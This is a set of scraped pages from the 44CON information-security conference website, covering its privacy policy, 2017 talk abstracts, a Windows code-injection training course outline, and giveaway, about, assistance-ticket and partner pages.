          • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
          • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
          • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

          Your information is not shared by us:

          • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

          On consent

          When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

          You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

          Use of collected data

          How we use your information:

          • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
          • In order to meet contractual obligations.
          • Improving our systems and marketing through the use of analytics.
          • Advertising goods and services.
          • To fulfil legal obligations under the laws of England and Wales.

          How long we retain it for (in order of importance from most to least):

          • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
          • As long as we need it in order to perform the functions above.
          • As long as consent is not withdrawn (e.g. our announce list).

          How we secure your information:

          • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
          • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
          • We try to avoid collecting information where practical.

          Transfers of information outside of the EU:

          As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

          Sensitive Personal Information

          We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

          #####EOF##### fsecure – 44CON

          TNMOC Guided Tour Giveaway

          Proudly sponsored by F-secure

          Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

          F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

          logo_f-Secure_Red-web

          The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of smart phone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

          After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

          How to enter:

          1. Sign up to our newsletter
          2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
          3. Keep an eye on your emails in mid August to see if you’re a winner

          Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

          Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

           

          #####EOF##### 44CON 2017 Talks – 44CON

          44CON 2017 Talks

          The Internet of Us

          Presented by: Don A. Bailey

          The Internet of Things has devolved into a four letter word on the tongues of information security researchers. As a result, we’ve endured the nonsensical rants of would-be hacker-pundits exclaiming every new technology must be junk that certainly can be hacked. Even if they’re right, they’re missing the point: the world is changing out from under them.

          IoT isn’t simply a trend that splices any given thing with a communications chip and rudimentary application. IoT is the next wave of computing. The boundaries between endpoints and cloud services is blurring into new abstractions with trendy names like ‘the fog’. As the blurring of resources continues, IoT won’t simply be things connecting to services, it will represent services extended inward toward our fingertips.

          This shift in computing has already started to upend the way we think about the effects of information security gaps. For example, most implementers and even auditors of IoT technology don’t understand that the greater risk to an insecure deployment isn’t to the consumer, it’s actually to the business. Many standard IoT models actually put the business at risk of bankruptcy due to the way services are exposed to endpoints, and how these services can be abused to create massive surges in fees.

          Yet, instead of identifying these shifts in architectural models, infosec pundits would rather shake their fist at the sky. We, as an industry, must do better not only for ourselves, but for the global community. Our job is to lift up the community and support it in its efforts to evolve our world. Otherwise, we will succeed in securing relics, leaving brave new worlds without an atmosphere.

          Without pointing fingers, this keynote presentation calls out the negative behaviours in IoT security punditry by demonstrating not only how new security models have slipped through the infosec community’s fingers, but how these gaps can be combatted and resolved with cost-effective strategies.

          At the end of this keynote, the audience should feel a new commitment toward infosec principles, and to new technological models. I hope to empower everyone to realize that The Internet of Things isn’t about stuff, it’s about Us. The Internet of Us.

          Linux Containers Made of Steel

          Presented by: Jessie Frazelle

          It is a well known fact that today Linux containers do not “contain.” This talk will cover the steps we have taken and can take in order to change the scepticism surrounding containers. This talk will cover active developments in the Linux kernel that are being worked on to get to this goal. It will go in depth into the design decisions of other similar technologies, such as Solaris Zones, VT-D, and VT-X, and how they can be applied to the primitives in Linux to reach a state of real “contained” sandboxes.

          (This talk sadly had to be cancelled)

          Cracking HiTag2 Crypto – Weaponising Academic Attacks for Breaking and Entering

          Presented by: Kevin Sheldrake

          HiTag2 is an RFID technology operating at 125KHz.  It is distinguished from many others in the same field by its use of 2-way communications for authentication and its use of encryption to protect the data transmissions – the majority of RFID technologies at 125KHz feature no authentication or encryption at all.  As a result it has been widely used to provide secure building access and has also been used as the technology that implements car immobilisers.

          In 2012, academic researchers Roel Verdult, Flavio D. Garcia and Josep Balasch published the seminal paper, ‘Gone in 360 Seconds: Hijacking with Hitag2’ that presented three attacks on the encryption system used in HiTag2.  They implemented their attacks on the Proxmark 3 device (an RFID research and hacking tool) and gave several high-profile demonstrations, but didn’t release any of their code or tools.  Since then, the forums supporting Proxmark 3 and RFIDler (another RFID hacking tool) have received many requests for implementations of these attacks, but so far none have been forthcoming.

          This talk covers implementation of all three attacks on RFIDler, supported by desktop computers.  The first attack uses a nonce replay to misuse the integrity protection of the comms in order to allow access to the readable RFID tag pages without needing to know the key.  The talk will cover how HiTag2 RFID works and will describe the first attack in detail plus the implementation challenges.  The attacks are weaponised and permit cloning of tags, which will be demonstrated.

          The tools used will be released after the talk.

          There is a workshop accompanying this talk which builds on the material covered and goes into further detail on a number of attacks, “Cracking HiTag2 Crypto: A Detailed Look at the Academic Attacks”. Attending this talk is a pre-requisite for the workshop.

          Chkrootkit: Eating APTs for breakfast since 1997

          Presented by: Nelson Murilo

          Chkrootkit will be 20 years old in 2017!

          The first chkrootkit release was 1997 and it was written by Klaus (CERT.br team) and the presenter. Chkrootkit is a suite of POSIX shell scripts and some tools written in ANSI C, and runs like a charm in virtually all Unix environment without dependencies. It can detect several rootkits, malicious activity (some APTs included) and can do post mortem forensic analysis to detect kernel module activities and related indicators of compromise.  This tool currently detects ~70 known Rootkits, Worms and many malicious activities. This talk will discuss the features and methods used to detect rootkits and malware in general, the limitations and potential options to improve it. Chkrootkit is an open source tool, so suggestions are always welcome.

          Biting the Apple that feeds you – macOS Kernel Fuzzing

          Presented by: Alex Plaskett and James Loureiro

          This talk details the use of MWR’s platform agnostic kernel fuzzing techniques to automatically identify critical flaws within Apple macOS.

          This talk will focus on how the researchers approached developing fuzzing automation to test the core subsystems of the XNU kernel and the insights gained, and also highlight architectural differences between other supported platforms which had to be addressed during this work.

          The old adage of ‘different fuzzers find different bugs’ will also be explored, as we looked into the effectiveness of using targeted fuzzing for specific components considered most likely to yield vulnerabilities.  

          An in-memory fuzzer based on a combination of static and dynamic analysis was also constructed to target these components with the aim to achieve greater code coverage, efficiency and to allow attacks on other privileged components within macOS via IPC.

          Finally we will discuss the issues discovered by the fuzzers and highlight future improvements which could be made to the tooling going forward to increase coverage and effectiveness.

          Various tools used during the research will be released after the talk.

          Breaking Historical Ciphers with Modern Algorithms

          Presented by: Klaus Schmeh

          Many old encryption methods are still hard to break today. For instance, cryptanalyzing a Turning Grill (a cipher device already known in the 18th century) is far from trivial. Many other encryption methods of historical importance can nowadays be broken, for instance Enigma messages from WW2, ADFGVX -ciphertexts from WW1, bigram substitutions, cipher slide messages, and double column transpositions.

          This presentation will introduce a number of non-trivial ciphers that played an important role in history and explain how they can be broken with modern means. This will be demonstrated with original ciphertexts from past centuries, some of which were deciphered only recently. A number of interesting improvements in this area have been developed in recent years. Research is still going on.

          In spite of all these efforts, there are still surprisingly many historical encryption methods (and original ciphertexts) that are unbroken to date. Among others, Enigma messages with less than 70 letters, double column transpositions with long key words, and numerous cold war ciphers still baffle cryptanalysts. However, research goes on and we might see further improvements in the near future.

          The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots

          Presented by: Gabriel Ryan

          Most forms of WPA2-EAP have been broken for nearly a decade. EAP-TTLS and EAP-PEAP have long been susceptible to evil twin attacks, yet most enterprise organizations still rely on these technologies to secure their wireless infrastructure. The reason for this is that the secure alternative, EAP-TLS, is notoriously arduous to implement. To compensate for the weak perimeter security provided by EAP-TTLS and EAP-PEAP, many organizations use port based NAC appliances to prevent attackers from pivoting further into the network after the wireless has been breached. This solution is thought to provide an acceptable balance between security and accessibility.

          The problem with this approach is that it assumes that EAP is exclusively a perimeter defence mechanism. In a wireless network, EAP plays a subtle and far more important role. WPA2-EAP is the means through which the integrity of a wireless network’s physical layer is protected. Port-based access control mechanisms rely on the assumption that the physical layer can be trusted. Just as NACs can be bypassed on a wired network if the attacker has physical access to the switch, they can also be bypassed in a wireless environment if the attacker can control the physical layer using rogue access point attacks.

          In this presentation, we will apply this concept by presenting a novel type of rogue access point attack that can be used to bypass port-based access control mechanisms in wireless networks. In doing so, we will challenge the assumption that reactive approaches to wireless security are an acceptable alternative to strong physical layer protections such as WPA2-EAP using EAP-TLS.

          Red Team Revenge : Attacking Microsoft ATA

          Presented by: Nikhil Mittal

          Microsoft Advanced Threat Analytics (ATA) is a defence platform which reads information from multiple sources like traffic for certain protocols to the Domain Controller, Windows Event Logs and SIEM events. The information collected is used to detect Reconnaissance, Credentials replay, Lateral movement, Persistence attacks etc. Well known attacks like Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Golden Ticket, Directory services replication, Brute-force, Skeleton key etc. can be detected using ATA. Whenever communication to a Domain Controller is performed using protocols like Kerberos, NTLM, RPC, DNS, LDAP etc., ATA will parse that traffic for gathering information about not only possible attacks but user behaviour as well. It slowly builds an organizational graph and can detect deviations from normal behaviour.

          This talk focuses on identifying and attacking ATA installations. Can ATA be attacked to suppress alerts? How noisy is it to attack ATA? How can alerts related to a particular identity (user and computer) be exempted? How can ATA be controlled and crippled remotely?

          The talk will be full of live demonstrations

          BaRMIe – Poking Java’s Back Door

          Presented by: Nicky Bloor

          Java’s Remote Method Invocation (RMI) enables developers to seamlessly interact with objects that reside within another Java Virtual Machine (JVM), potentially on a remote server. As is often the case, the trade-off for seamless remote method invocation is security. While many consider RMI to be outdated and uninteresting, many in-service implementations remain trivial to exploit, and there are many questions to consider. How common is RMI? How many RMI services are making the same mistakes when it comes to security? What else could I do with arbitrary RMI services? Can RMI services be secured, and if so, how?

          I set about finding answers to those questions. Along the way I wrote a tool to help with enumeration of RMI services, called BaRMIe, which eventually became an exploitation tool following the discovery of vulnerabilities within Java itself.

          During this talk I’ll look at the work I did and present the results of my research including answers to my original questions and the exploitation tool I wrote, BaRMIe.

          Persisting with Microsoft Office: Abusing Extensibility Options

          Presented by: William Knowles

          One software product that red teamers will almost certainly find on any compromised workstation is Microsoft Office. This talk will discuss the ways that native functionality within Office can be abused to obtain persistence.

          A wide range of techniques for abusing various add-in mechanisms will be covered. Each persistence mechanism will be discussed in terms of its relative advantages and disadvantages for red teamers. In particular, with regards to their complexity to deploy, privilege requirements, and applicability to Virtual Desktop Infrastructure (VDI) environments which hinder the use of many traditional persistence mechanisms.

          The talk will finish with approaches to detection and prevention of these persistence mechanisms.

          See no evil, hear no evil: Hacking invisibly and silently with light and sound

          Presented by: Matt Wixey

          Traditional techniques for C2 channels, exfiltration and exploitation are often frustrated by the growing sophistication and prevalence of security protections, monitoring solutions, and controls. Whilst all is definitely not lost from an attacker’s perspective – we constantly see examples of attackers creatively bypassing such protections – it is always beneficial to have more weapons in one’s arsenal, particularly when coming up against heavily-defended networks and highly-secured environments.

          This talk presents and demonstrates a number of techniques and attacks which utilise light and/or sound, covering everything from C2 channels and exfiltration using light and near-ultrasonic sounds, to disabling and disrupting motion detectors; from a DIY laser microphone to sending a drone into the stratosphere; from trolling friends, to jamming speech, and demotivating malware analysts.

          This talk not only provides attendees with a new suite of techniques and methodologies to consider when coming up against a well-defended target, particularly for on-site engagements, but also demonstrates – in a hopefully fun and practical way – how these techniques work, their pros and cons, and possible future developments.

          I also consider mitigation against some of these attacks, where applicable, and encourage defenders to consider how and why some of these attacks might work where traditional methods fail.

          Secrets Of The Motherboard (Shit My Chipset Says)

          Presented by: Graham Sutherland

          Modern motherboards are fairly daunting pieces of hardware. They’re full of closed-source firmware, undocumented and obscure parts, incredibly complex components, and are developed by people with vast domain-specific knowledge. They’re also full of exciting security-impacting technologies like IME, AMT, SMM, TPM, and UEFI. But, despite the apparent difficulty, what if we took a stab at trying to understand these devices and what security looks like at the bare-metal level? The real secret is that it’s not as hard as it looks.

          This talk runs through a list of weird and wonderful things I found while reading datasheets for Intel chipsets and other motherboard parts. Along the way we’ll explore unusual functionality not intended for production use, features we can exploit to build more open platforms, potential security pitfalls in motherboard design, and the challenges faced by certain industries in attempting to secure hardware for reuse.

          Cisco ASA Episode 2: Striking back – Internals and Mitigations

          Presented by: Cedric Halbronn

          In 2016, two critical vulnerabilities were published that targeted Cisco ASA (Adaptive Security Appliance) firewalls. Even though the exploits for both are public, they are restricted to specific ASA versions and there is no public tool to understand how they work. This talk is about ASA internals, the reverse engineering involved and tools we have developed to better weaponize exploits.

          In addition to covering previously unpublished details of Cisco ASA internals and how the exploit was generalised to apply to over 100 versions and made 100% reliable, the talk will cover a number of tailor-made tools developed to assist in the reverse engineering and exploit production. The tools will be released after the talk.

           

          Inside Android’s SafetyNet Attestation: What it can and can’t do lessons learned from a large scale deployment

          Presented by: Colin Mulliner

          There are many reasons for protecting your mobile applications against modification and tampering. Until recently you had to use third party tools or implemented your own app integrity checks and device rooting checks. Today you can use Android’s SafetyNet Attestation infrastructure to ensure the integrity of your application and the user’s device. Unfortunately, SafetyNet Attestation is not well documented by Google.

          This talk provides a deep dive into SafetyNet Attestation. We show what level of attestation SafetyNet provides and what it can’t do. The talk is based on the lessons learned from implementing SafetyNet Attestation for an app with a large install base. We turned SafetyNet upside down to find its flaws and shortcomings. This talk will provide you with everything you need to know about Android’s SafetyNet Attestation and will help you to implement and use it in your app.

          Subgraph OS: Hardening a Linux Desktop

          Presented by: David Mirza Ahmad

          Subgraph OS is an operating system designed to provide a hardened Linux desktop resistant to network and malware attacks.

          Subgraph includes a hardened kernel, application sandboxing with per-application network rules, an application firewall and extensive security monitoring and alerting.

          This presentation will outline the overall design and goals of the project and detail progress so far, including a detailed description of the sandboxing implementation.

          Hypervisor-Assisted Ring0 Debugging with radare2

          Presented by: Lars Haukli

          Reverse engineering protected code operating in kernel mode can be challenging. More advanced protection mechanisms typically combine obfuscation or encryption with techniques that hinder dynamic analysis. Some code will not run at all when certain debugging features are enabled by the OS.

          radare2 is a comprehensive open-source framework for reverse engineering, that takes you to a magical world where control flow graphs of disassembled code are displayed in ASCII art. The framework combines a vast set of code analysis capabilities, which you can make use of in a variety of ways.

          Enter the idea of connecting radare2 to a virtual machine, giving it direct access to guest physical memory. The intent is to debug Ring0 code running inside the guest, with the debugging mechanism operating exclusively on the host.

          This talk will cover the use of radare2 on a Linux host accessing a Windows VM.

          Lessons Learned Hunting IoT Malware

          Presented by: Olivier Bilodeau

          Permeating the entire spectrum of computing devices, malware can be found anywhere code is executed. Embedded devices, of which many are a part of the Internet of Things (IoT), are no exception. With their proliferation, a new strain of malware and tactics have emerged. This presentation will discuss our lessons learned from reverse-engineering and hunting these threats.

          During our session, we will explain the difficulty in collecting malware samples and why operating honeypots is an absolute requirement. We will study some honeypot designs and will propose an IoT honeypot architecture comprising several components like full packet capture, a man-in-the-middle framework and an emulator.

          Additionally, reverse-engineering problems and practical solutions specific to embedded systems will be demonstrated. Finally, we will explore three real-world cases of embedded malware. First, Linux/Moose, a stealthy botnet who monetizes its activities by selling fraudulent followers on Instagram, Twitter, YouTube and other social networks. Second, a singular ELF binary of the MIPS architecture which serves as a dropper. Third, LizardSquad’s LizardStresser DDoS malware known as Linux/Gafgyt. Attendees will leave this session better equipped to hunt this next generation of malware using primarily open source tools.

          So You Want to Hack Radios

          Presented by: Marc Newlin and Matt Knight

          The Age of the Radio is upon us: wireless protocols are a dime a dozen thanks to the explosion of the Internet of Things. While proprietary wireless solutions may offer performance benefits and cost savings over standards like 802.11 or Bluetooth, their security features are rarely well-exercised due to lack of access to these interfaces. The adoption of Software Defined Radio (SDR) by the security research community has helped shift this balance, however SDR remains a boutique skillset. Join us as we lift the veil on SDR and show that a PhD is not need to pwn the Internet of Things Radios.

          This session offers a tutorial on how to apply Software Defined Radio, with an emphasis on the “Radio” part. Rather than glazing over RF basics, we will frame our entire discussion about reverse engineering wireless systems around digital radio fundamentals.

          We begin with an offensively short crash course in digital signal processing and RF communication, covering just enough to be dangerous, before introducing a reverse engineering workflow that can be applied to any wireless system. We will show how to use this workflow to recover and inject packets from/into a variety of devices with proprietary modulations.

          Attendees should expect to walk away with practical knowledge of how to apply SDR to examine proprietary wireless protocols. We will release GNU Radio flowgraph templates and shell scripts to get attendees started.

          Checking BIOS protections offline with just the firmware updates

          Presented by: Oleksandr Bazhaniuk and Yuriy Bulygin

          Vulnerabilities in system firmware allow adversaries to bypass almost any protection used in the operating system, virtual machine manager and other software. System firmware attacks bypass Secure Boot, software based full-disk encryption and virtualization-based security. Threats exploiting such vulnerabilities can extract secrets from operating system memory, subvert secure/trusted VMs and even hypervisors, install stealthy and persistent implants and even brick physical systems.

          We’ve discovered a number of such vulnerabilities in the past and developed an open source framework to automate analysis. Despite these risks there are still many modern systems which do not protect their main BIOS/UEFI firmware. We decided to analyze thousands of UEFI firmware updates from multiple platform vendors and discovered hundreds of vulnerabilities, indicating that corresponding systems lack any basic firmware protections in ROM or signed firmware updates. We’ll present the process, findings and limitations of such offline analysis of vendor firmware update images.

          Hide Yo Keys, Hide Yo Car: Remotely Exploiting Connected Vehicle APIs and Apps

          Presented by: Aaron Guzman

          Today, most vehicle manufacturers in the US connect their vehicles to a type of network and delegate controls to mobile or web applications upon vehicle purchasing. Thankfully in the US, security research for consumer devices are now exempt from DMCA which enables us to audit and assess our connected vehicles. Like many devices in the IoT space, a single software bug in connected vehicles can compromise the entire ecosystem.

          In this talk, we will demonstrate the methodology used to discover and remotely exploit vulnerabilities in Subaru’s STARLINK remote vehicle services, as well as discuss how car manufacturers can learn from these mistakes. After all, who needs car keys when your vehicle is “connected”?

           

          #####EOF##### About 44CON – 44CON

          About 44CON

          What is 44CON?

          44CON is an Information Security Conference & Training event taking place in London. Designed to provide something for the business and technical Information Security professional.

          Why do 44CON?

          To bring the best in international Security training + speaking (as well as the best of local talent) to the UK at a reasonable cost.

          44CON is located in London, which allows for a wide variety of security professionals to attend from the UK, Europe and further afield.

          At the bigger conferences, getting time with top class security speakers is limited. At 44CON, you have great access to speakers, who are all willing to spend time and talk about their work. This is where interesting partnerships can occur.

          Don’t just take our word for it, check out what others have said about the conference on our media coverage page.

          Who’s behind it?

          Sense/Net Ltd is the company the holds the IP for 44CON. Sense/Net is an events management company set up by Adrian and Steve to run conferences and events. Our flagship conference, 44CON is a public event bringing together the best in UK and International information security research and networking opportunities. If you would like an internal conference for your organisation, or have a requirement for a bespoke event please contact us to discuss your requirement and how we can help.

          Leave a Reply

          #####EOF##### Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites – 44CON

          Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

          Lab Materials for Advanced Wireless Attacks Workshop
          For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
          • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
          • A step-by-step lab setup guide
          • A detailed course guide to supplement the material covered in the workshop
          Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
          If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.
          #####EOF##### Code injections from beginner to advanced for defenders and attackers – 44CON

          Code injections from beginner to advanced for defenders and attackers

          Presented By: David Korczynski, ADA Logics

          Code injection is a technique that is becoming increasingly prevalent in attacks and data breaches. Both malware writers and dedicated penetration teams rely on these techniques because host-based intrusion prevention systems and enterprise organisations increasingly deploy whitelisted applications that are all lucrative targets to bypass security checks.

          In this course we will cover code injection from beginning to advanced. We will do a deep dive into the Windows API that makes injection possible and go through many existing techniques. You will be provided with source code and binaries of the code injection techniques and get your hands dirty by analysing real-world code injection attacks. We will go through how to detect each of the techniques and also observe how different endpoint​ protection systems deal with them.

          The course starts with an introduction to the course too​lbox and the first well-known code injection techniques via “CreateRemoteThread”. We will then progress through more advanced and modern techniques like process hollowing, PowerLoader, Atom Bombing, reflective DLL injection and more, to reach our goal of an advanced understanding about contemporary code injections based on hands-on experiences and, by the end of the course, well-understood concepts.

          The 3 day course will take place on the 9th, 10th and 11th of September 2019 at the Novotel London West
          Cost is £ 1,950 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Provide students with a fundamental understanding about code injection techniques and the purpose of such.
          • To bring students up to speed with the latest code injection techniques including strengths/weaknesses of each technique.
          • To enable students to navigate the source code of code injection techniques.
          • To enable students to analyse code injection techniques manually via a debugger.
          • To familiarise students with how automated procedures for detecting and
            analysing code injection techniques work.
          • To reinforce the above knowledge through exercises and hands-on experience.

          Course Outline

          Day 1 – Introduction and first code injections Morning (9.00 – 12.00)

          • Introduction and overview of course
          • Introducing the toolbox

          Afternoon (13.00-17.00)

          • Understanding physical and virtual memory, and Windows processes
          • First code injection techniques (CreateRemoteThread)
          • Executing and monitoring code injections
          • Extracting code injection artifacts
            • Volatility
            • Sandbox(es)

          Day 2 – In-depth view on common techniques and real-world attacks Morning (9.00 – 12.00)

          • Recap of day 1
          • Reflective code injection (injections that never touch disk)

          Afternoon (13.00 – 17.00)

          • Constructing and analysing reflective code injection
          • Process hollowing and hooking
          • Constructing and analysing process hollowing
          • Deep analysis of real-world attack
            • Deep-dive into a real-world malware sample that heavily utilises code injections.

          Day 3 – Taking it to the next level with exploit-like techniques Morning (9.00 – 12.00)

          • Recap of day 2
          • Chaining code injections together like APTs

          Afternoon (13.00 – 17.00)

          • Introduction to Return Oriented Programming (ROP) and Data Execution Prevention (DEP)
          • Introduction to Windows shared objects and shared sections
          • PowerLoader – Targeted code injection using exploit-like features
          • Building and analysing PowerLoader
          • Real-world example of PowerLoader malware
          • Atom Bombing – Advanced code injection against any Windows process
          • Further code injections
            • Early-bird
            • Gargoyle
          • Course summary and conclusion

          Target Audience

          This course has a broad audience and is relevant for both defenders and attackers, as well as both programmers and analysts. All of the exercises throughout have source-code and binary-code available so you can go through exercises without writing a single line of code, while still understanding the material of the course in-depth. Specifically, you do not need to be a programmer to use the information from this course.

          Specifically, this course is aimed at:

          • Malware analysts
          • Threat analysts
          • Incident response
          • Red team professionals that build custom tools
          • Security engineers

          Prerequisites:

          It is expected that students have some information security experience and are familiar with concepts of programming, assembler and debugging. The course is not a beginners course, but does not need for you to be an expert in either of the three skills listed. We will move from early beginners concepts and then move to advanced topics later in the course. As such, the learning curve can be steep at times, but the course comes with many tailored materials that students can digest at their own pace, e.g. varying complexity in exercises.

          What to Bring

          Laptop with:

          • A modern processor (we will run virtual machines, so more cores is better)
          • At least 8 GB ram
          • At least 50 GB free space
          • VMWare workstation pro (we need pro because of snapshots)
          • Windows 7 x64 and x86, and Windows 10×64 virtual machines

          Students will be provided with

          1. Printed course book
          2. Source code and binary format of code injections introduced
          3. Examples of real-world malware that uses code injection techniques, including relevant and detailed analysis.
          4. Access to online platform with exercises and content

          About the Trainer

          Lead Instruction – David Korczynski, Ada Logic – @davkorcz

          David Korczynski is a researcher in software security and program analysis. He specialises in building tools to automate reverse engineering, be it custom malware sandboxes, static analysis tools, automatic bug finders, compiler extensions etc. He is a co-founder of Ada Logics, a company that specialises in advanced software research for high-profile industry clients. Ada Logics specialises in automatic program analysis for software security. David finished his PhD in Computer Science at Oxford University where he specialised in automatic analysis of malware that use advanced code injection techniques and other complex obfuscation techniques. He has carried out software security research in both industry and academia.

          Book your 44CON 2019 training course now!

          #####EOF##### DSC_5186-1 – 44CON

          DSC_5186-1

          #####EOF##### Een link delen op Twitter

          Een link delen met je volgers

          Nieuw op Twitter?

          Ontvang directe updates van je vrienden, zakenexperts, je favoriete beroemdheden en wat er gebeurt in de wereld.

          Wat is Twitter? Meer informatie.

          #####EOF##### 44CON Assistance tickets – 44CON

          44CON Assistance tickets

          Would you like to attend 44CON but don’t have the means to make it happen?

          We realise that not everyone is able to to fund their own conference attendance. In partnership with our sponsors, we’ve launched an assistance program to provide the opportunity to attend 44CON to those who wouldn’t be able to come otherwise.

          Wire Security logo -2019 assistance

          We are pleased to announce that the first Assistance Sponsor for 44CON 2019, sponsoring two tickets, is Wire Security bvba. Watch this space for details of the 2019 assistance program and application process.

          The fine print:

          • Details provided for assistance ticket applications will be used for the selection process, event registration and hotel reservations in line with the 44CON Privacy Policy.
          • Assistance tickets are not transferable.
          • Attendance to the event is subject to the 44CON house rules.
          #####EOF##### Partners of 44CON – 44CON

          Partners of 44CON

           

          Conference Partners

          DeepSec

          https://deepsec.net

          Bringing together the world’s most renowned security professionals from academics, government, industry, and the underground hacking community.

          SteelCon

          https://www.steelcon.info/

          SteelCon is an event held in the North of England for anyone who is interested in how things work, how things can be broken and how they can be fixed. It’s for people who like to tinker with things, aren’t happy with something until they know how it does what it does and won’t let something be broken without trying to fix it. SteelCon 2018 took place on 3rd-8th of July and 44CON ran the soldering area, we hope you saw us there!

          HITB logo regular

          Hack in the Box

          http://conference.hitb.org/

          HITBSecConf or the Hack In The Box Security Conference is an annual must attend event in the calendars of security researchers and professionals around the world. Held annually in Kuala Lumpur, Malaysia and Amsterdam in The Netherlands, HITBSecConf is a platform for the discussion and dissemination of next generation computer security
          issues. Our events routinely feature two days of trainings and a two-day multi-track conference featuring cutting-edge hardcore technical talks delivered by some of the most respected names in the computer security industry. HITBSecConf is a place where ideas are exchanged, talent discovered and genius celebrated.

          SS_heads

          Suits & Spooks

          http://www.suitsandspooks.com

          Suits and Spooks London 2015 was held at the techUK facility in London. Following a fantastic event in 2014, Suits and Spooks London 2015 was our first 2-day international event. Speakers included Marina Litvinenko, the widow of the Russian FSB officer who was poisoned in London with radiation, EJ Hilbert of Kroll Associates, Zach Tumin of the NYPD, and many more. We’ll also have representatives from the British government speaking and in attendance, along with British Venture Capitalists and the usual mix of public and private sector participants.

          Media Partners
          ORM_logo_box_rgb

          O’Reilly

          http://www.oreilly.com/

          O’Reilly provides technology and business training, knowledge, and insight to help companies succeed in the face of huge economic and technological shifts confronting businesses today. Our unique network of security experts and innovators share their knowledge and expertise on the company’s comprehensive training and information platform and at the O’Reilly Security conference in New York.

          Community Partners
          bsides

          BSides London

          http://www.securitybsides.org.uk

          B-Sides London, Security B-Sides is a community-driven event built for and by information security community members.

          BSides London 2018 took took place on 6 June 2018 at the ILEC conference centre.

          BSidesAth_logo01_250x250
          crest-new

          CREST

          CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

          All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

          Follow us on Twitter: @crestadvocate

          44CON will be a community sponsor of CRESTCon 2019 that will take place on 14th March 2019 at the Royal College of Physicians in London.

          IISP logo high-res centered

           IISP

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

          Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

          At the heart of the Institute is the IISP Skills Framework©2012 which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes  including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits  training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience. 

          More information about the IISP and its work can be found at www.iisp.org.

          ISSA-UK

          ISSA-UK

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          RawHex

          We break things so you don’t have to. We build things so you can do, too. Home of the HIDIOT, the little computer you can build yourself.

          OWASP

          The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

           

